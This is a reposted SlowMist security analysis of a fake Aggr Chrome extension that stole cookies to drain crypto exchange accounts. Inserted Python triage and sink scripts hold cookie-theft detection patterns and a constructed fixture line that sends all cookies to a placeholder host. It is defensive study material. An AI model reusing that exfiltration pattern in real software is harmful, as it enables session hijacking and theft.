Popular Science | Analysis of Fake Chrome Extension Theft


BlockBeats, 2024/06/03 10:43
By: BlockBeats
Original title: "A wolf in sheep's clothing | Analysis of fake Chrome extension theft"
Original author: Shan, Thinking, SlowMist Security Team


Background


On March 1, 2024, according to feedback from Twitter user @doomxbt, there was an abnormality in his Binance account and funds were suspected of being stolen:


Popular Science | Analysis of Fake Chrome Extension Theft image 0

(https://x.com/doomxbt/status/1763237654965920175)


At first, this incident did not attract much attention, but on May 28, 2024, Twitter user @Tree_of_Alpha analyzed it and found that the victim @doomxbt had probably installed the malicious Aggr extension from the Chrome Web Store, where it had many positive reviews. The extension can steal all cookies on the websites a user visits, and someone paid influential people to promote it 2 months ago.


Popular Science | Analysis of Fake Chrome Extension Theft image 1

(https://x.com/Tree_of_Alpha/status/1795403185349099740)


Over the past two days, this incident has drawn more and more attention. The victims' logged-in credentials were stolen, and the hackers then drained the victims' cryptocurrency assets through counter-trading. Many users have consulted the SlowMist security team about this issue. Below, we analyze the attack in detail and sound the alarm for the crypto community.


Analysis


First, we have to obtain the malicious extension. Although Google has already removed it from the Chrome Web Store, we can still see some historical data through snapshot information.


Popular Science | Analysis of Fake Chrome Extension Theft image 2


After downloading and unpacking it, the JS files in the extension directory are background.js, content.js, jquery-3.6.0.min.js and jquery-3.5.1.min.js.


During static analysis, we found that background.js and content.js did not contain much complex code, nor any obviously suspicious logic. However, background.js did contain a link to a site: the data collected by the extension is sent to https[:]//aggrtrade-extension[.]com/statistics_collection/index[.]php.


Popular Science | Analysis of Fake Chrome Extension Theft image 3


By analyzing the manifest.json file, we can see that the background script loads /jquery/jquery-3.6.0.min.js and the content script loads /jquery/jquery-3.5.1.min.js, so we focused on analyzing these two jquery files:


Popular Science | Analysis of Fake Chrome Extension Theft image 4


We found suspicious malicious code in jquery/jquery-3.6.0.min.js: it serializes the browser's cookies as JSON and sends them to the site https[:]//aggrtrade-extension[.]com/statistics_collection/index[.]php.


Popular Science | Analysis of Fake Chrome Extension Theft image 5
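The static checks above (manifest wiring, a vendored "jquery" file that reads cookies and contacts an external host) can be turned into a reusable triage script. The following is an added example written for this page, not SlowMist's tooling and not code from the extension; the extension fixture it builds is constructed to mirror the layout described in the write-up, and the collector hostname `collector.example.invalid` is a placeholder.

```python
"""Static triage of an unpacked Chrome extension (added example, not SlowMist tooling).

Reads manifest.json, follows every script the manifest wires in (MV2 and MV3
shapes), and flags a script that both touches the cookie API and can ship
data out. A vendored library such as jquery-*.min.js doing that is the
pattern from the write-up. build_sample_extension() is a constructed fixture.
"""
import json
import os
import re
import tempfile

# Permissions that allow reading cookies on every site the user visits.
RISKY_PERMISSIONS = {"cookies", "<all_urls>", "webRequest", "tabs"}

# Ways a script can read cookies; a genuine copy of jQuery does none of this.
COOKIE_ACCESS = [r"chrome\.cookies\.getAll", r"chrome\.cookies\.get\b", r"document\.cookie"]

# Ways to ship data out. XMLHttpRequest is deliberately excluded because the
# real jQuery contains it for its ajax transport and would be a false positive.
NETWORK_CALLS = [r"\bfetch\s*\(", r"navigator\.sendBeacon", r"new\s+WebSocket"]

EXTERNAL_URL = re.compile(r"https?://[\w.-]+(?:/[\w./?=&-]*)?")
LIBRARY_NAME = re.compile(r"(?:.*/)?jquery[-\d.]*\.min\.js$")


def referenced_scripts(manifest):
    """Every script path the manifest loads, with the leading '/' removed."""
    scripts = []
    bg = manifest.get("background", {})
    scripts += bg.get("scripts", [])            # MV2 background page
    if "service_worker" in bg:                  # MV3 service worker
        scripts.append(bg["service_worker"])
    for cs in manifest.get("content_scripts", []):
        scripts += cs.get("js", [])
    return [s.lstrip("/") for s in scripts]


def scan_script(path):
    """Suspicious API use and external URLs found in a single file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    return {
        "cookie_access": [p for p in COOKIE_ACCESS if re.search(p, src)],
        "network_calls": [p for p in NETWORK_CALLS if re.search(p, src)],
        "urls": sorted(set(EXTERNAL_URL.findall(src))),
    }


def triage(ext_dir):
    """Return a report dict; verdict is 'suspicious' if any script is flagged."""
    with open(os.path.join(ext_dir, "manifest.json"), encoding="utf-8") as fh:
        manifest = json.load(fh)
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    report = {"risky_permissions": sorted(perms & RISKY_PERMISSIONS), "scripts": {}, "verdict": "clean"}
    for rel in referenced_scripts(manifest):
        result = scan_script(os.path.join(ext_dir, rel))
        result["library_name"] = bool(LIBRARY_NAME.match(rel))
        # Reading cookies is only damning when the data can also leave the browser.
        result["flagged"] = bool(result["cookie_access"]) and bool(result["network_calls"] or result["urls"])
        report["scripts"][rel] = result
        if result["flagged"]:
            report["verdict"] = "suspicious"
    return report


def build_sample_extension():
    """Constructed fixture mirroring the layout in the write-up; not the real extension."""
    root = tempfile.mkdtemp(prefix="ext-triage-")
    os.makedirs(os.path.join(root, "jquery"))
    manifest = {
        "manifest_version": 2, "name": "sample-extension",
        "permissions": ["cookies", "<all_urls>", "storage"],
        "background": {"scripts": ["background.js", "/jquery/jquery-3.6.0.min.js"]},
        "content_scripts": [{"matches": ["<all_urls>"], "js": ["/jquery/jquery-3.5.1.min.js", "content.js"]}],
    }
    files = {
        "manifest.json": json.dumps(manifest),
        "background.js": "chrome.runtime.onInstalled.addListener(() => {});",
        "content.js": "console.log('content loaded');",
        # Benign stand-in for a genuine vendored library: header URL, no cookie access.
        "jquery/jquery-3.5.1.min.js": "/*! jQuery v3.5.1 | https://jquery.org/license */ window.jQuery = {};",
        # Stand-in for the tampered copy: cookie API plus a POST to an external placeholder host.
        "jquery/jquery-3.6.0.min.js": ("/*! jQuery v3.6.0 */ chrome.cookies.getAll({}, c => "
                                       "fetch('https://collector.example.invalid/index.php', "
                                       "{method:'POST', body: JSON.stringify(c)}));"),
    }
    for rel, content in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    print(json.dumps(triage(build_sample_extension()), indent=2))
```

Run it against a real unpacked extension with `triage("/path/to/extension")`; the report lists the risky permissions, and for each script the cookie and network patterns it matched plus every URL literal, so the analyst sees at a glance which file is the odd one out.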


After static analysis, in order to observe more precisely how the malicious extension sends data, we installed and debugged the extension. (Note: the analysis should be conducted in a brand-new test environment with no account logged in, and the malicious site should be replaced with one you control, so that no sensitive data is sent to the attacker's server during the test.)


After installing the malicious extension in the test environment, open any website, such as google.com, and observe the network requests made by the extension's background page. We found that the cookie data for google.com is sent to an external server:


Popular Science | Analysis of Fake Chrome Extension Theft image 6


We can also see the cookie data sent by the malicious extension on the Weblog service:


Popular Science | Analysis of Fake Chrome Extension Theft image 7
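For the dynamic step above, the "self-controllable" endpoint can be a small local sink that receives whatever the extension posts and logs it with cookie values redacted. The following is an added example written for this page, not SlowMist's Weblog service; it assumes the exfiltration URL in the extension has been rewritten to point at http://127.0.0.1:8080/ in the test environment, and the request body format (a JSON array of Chrome cookie objects) is an assumption, so `summarize_exfil()` may need adjusting for a given sample. The sample body is constructed.

```python
"""Local exfiltration sink for dynamic analysis (added example, not SlowMist tooling).

Run it, point the extension's hard-coded collector URL at 127.0.0.1:8080 in
the test environment, and each POST is summarised per cookie domain with the
secret values replaced by a short fingerprint. The body format assumed here
(a JSON array of {domain, name, value} objects) is an assumption.
"""
import hashlib
import json
from http.server import BaseHTTPRequestHandler, HTTPServer

# Cookie names that usually carry a login session. Seeing one of these leave
# the browser is the finding that matters for an exchange account.
SESSION_HINTS = ("sess", "token", "auth", "sid", "jwt", "login")


def redact(value):
    """Short fingerprint so repeated posts can be correlated without logging the secret."""
    return hashlib.sha256(value.encode()).hexdigest()[:12]


def summarize_exfil(body):
    """One posted body -> {domain: [{name, fingerprint, session_like}, ...]}."""
    cookies = json.loads(body)
    if isinstance(cookies, dict):                 # some samples wrap the array in an object
        cookies = cookies.get("cookies", [])
    summary = {}
    for c in cookies:
        name = str(c.get("name", ""))
        summary.setdefault(c.get("domain", "?"), []).append({
            "name": name,
            "fingerprint": redact(str(c.get("value", ""))),
            "session_like": any(h in name.lower() for h in SESSION_HINTS),
        })
    return summary


class SinkHandler(BaseHTTPRequestHandler):
    """Accepts any POST, prints the redacted summary, always answers 200."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length)
        try:
            summary = summarize_exfil(body)
        except ValueError:                        # not JSON: record only the size
            summary = {"_raw_bytes": len(body)}
        print(json.dumps({"path": self.path, "summary": summary}, indent=2))
        self.send_response(200)
        self.end_headers()

    def log_message(self, *args):                 # keep stdout for our own summaries
        pass


def serve(port=8080):
    HTTPServer(("127.0.0.1", port), SinkHandler).serve_forever()


# Constructed sample of the kind of body a cookie-stealing extension might post.
SAMPLE_BODY = json.dumps([
    {"domain": ".example-exchange.invalid", "name": "session_id", "value": "abc123"},
    {"domain": ".example-exchange.invalid", "name": "locale", "value": "en"},
    {"domain": ".google.com", "name": "NID", "value": "xyz"},
]).encode()


if __name__ == "__main__":
    print(json.dumps(summarize_exfil(SAMPLE_BODY), indent=2))
    serve()
```

Because the extension's original endpoint is HTTPS, rewriting it to a plain-HTTP loopback address is the simplest way to avoid certificate handling in the sandbox; the fingerprint column lets you confirm that the same session cookie is being re-sent on every page load without ever writing the token itself to a log.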


At this point, once the attacker has hijacked cookies through the browser extension and thereby obtained the user's authentication credentials and other information, he can carry out follow-up attacks on certain trading websites and steal the user's crypto assets.


Let’s analyze the malicious link https[:]//aggrtrade-extension[.]com/statistics_collection/index[.]php.


Domain name involved: aggrtrade-extension[.]com


Popular Science | Analysis of Fake Chrome Extension Theft image 8


Analysis of the domain name information in the picture above:


Popular Science | Analysis of Fake Chrome Extension Theft image 9


The .ru details point to a typical Russian-speaking user, so this is likely a Russian or Eastern European hacker group.


Attack timeline:


Analyzing the malicious website aggrtrade-extension[.]com, which impersonates AGGR (aggr.trade), we found that the hacker started planning the attack 3 years ago:


Popular Science | Analysis of Fake Chrome Extension Theft image 10


Popular Science | Analysis of Fake Chrome Extension Theft image 11


4 months ago, the hacker deployed the attack:


Popular Science | Analysis of Fake Chrome Extension Theft image 12


Popular Science | Analysis of Fake Chrome Extension Theft image 13


Popular Science | Analysis of Fake Chrome Extension Theft image 14


According to the InMist Threat Intelligence Cooperation Network, we found that the hacker’s IP is located in Moscow, using a VPS provided by srvape.com, and the email address is aggrdev@gmail.com.


Popular Science | Analysis of Fake Chrome Extension Theft image 15


After the deployment succeeded, the hacker began promoting the extension on Twitter and waited for victims to take the bait. The rest of the story is well known: some users installed the malicious extension and had their funds stolen.


The following picture is the official reminder of AggrTrade:


Popular Science | Analysis of Fake Chrome Extension Theft image 16


Summary


The SlowMist Security Team reminds users that the risk of installing a browser extension is almost as great as that of running an executable file directly, so be sure to review extensions carefully before installation. At the same time, be wary of those who send you private messages: hackers and scammers now like to impersonate legitimate, well-known projects and defraud content creators under the guise of sponsorship, promotion and the like. Finally, when walking in the dark forest of blockchain, always remain skeptical and make sure that what you install is safe, so that hackers are given no opportunity to take advantage.

